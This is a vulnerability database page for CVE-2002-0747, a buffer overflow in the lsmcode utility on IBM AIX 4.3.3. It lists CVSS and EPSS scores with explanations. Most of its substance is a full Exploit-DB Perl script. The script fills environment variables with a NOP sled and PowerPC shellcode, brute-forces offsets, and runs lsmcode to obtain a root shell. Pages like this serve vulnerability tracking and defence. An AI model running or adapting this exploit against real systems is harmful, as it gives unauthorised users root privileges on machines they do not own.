CVE-2002-0747 : Detail

CVE-2002-0747

0.6%V3
Network
2002-07-26
02h00 +00:00
2002-07-31
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in lsmcode in AIX 4.3.3.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22756

Publication date : 2003-05-31 22h00 +00:00
Author : watercloud
EDB Verified : Yes

source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. #!/usr/bin/perl # FileName: x_lsmcode_aix4x.pl # Exploit lsmcode of Aix4.3.3 to get a uid=0 shell. # Tested : on Aix4.3.3.Mybe can work on other versions. # Author : [email protected] # Site : www.xfocus.org www.xfocus.net # Date : 2003-6-1 # Announce: use as your owner risk! $CMD="/usr/sbin/lsmcode"; $_=`/usr/bin/oslevel`; $XID="\x03"; $UID="\x97"; print "\n\nExploit $CMD for Aix 4.3.3 to get uid=0 shell.\n"; print "From: [ www.xfocus.org 2003-6-1 ].\n\n"; $NOP="\x7c\xa5\x2a\x79"x800; %ENV=(); $ENV{CCC}="A" .$NOP.&getshell($XID,$UID); $ENV{DIAGNOSTICS}="\x2f\xf2\x2a\x2f"x300; $ret = system $CMD ,"-d","a"; for($i=0;$i<4 && $ret;$i++){ for($j=0;$j<4 && $ret;$j++) { $ENV{CCC}="A"x $i .$NOP.&getshell($XID,$UID); $ENV{DIAGNOSTICS}="A"x $j ."\x2f\xf2\x2a\x2f"x300; $ret = system $CMD ,"-d","a"; } } #sub sub getshell($XID,$GID) { my $SHELL,($XID,$GID)=@_; $SHELL="\x7e\x94\xa2\x79\x7e\x84\xa3\x78\x40\x82\xff\xfd"; $SHELL.="\x7e\xa8\x02\xa6\x3a\xb5\x01\x40\x88\x55\xfe\xe0"; $SHELL.="\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"; $SHELL.="\x4c\xc6\x33\x42\x44\xff\xff\x02$GID$XID\xff\xff"; $SHELL.="\x38\x75\xff\x04\x38\x95\xff\x0c\x7e\x85\xa3\x78"; $SHELL.="\x90\x75\xff\x0c\x92\x95\xff\x10\x88\x55\xfe\xe1"; $SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff"; return $SHELL; } #EOF

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 4.3.3

References

http://archives.neohapsis.com/archives/aix/2002-q2/0005.html
Tags : vendor-advisory, x_refsource_AIXAPAR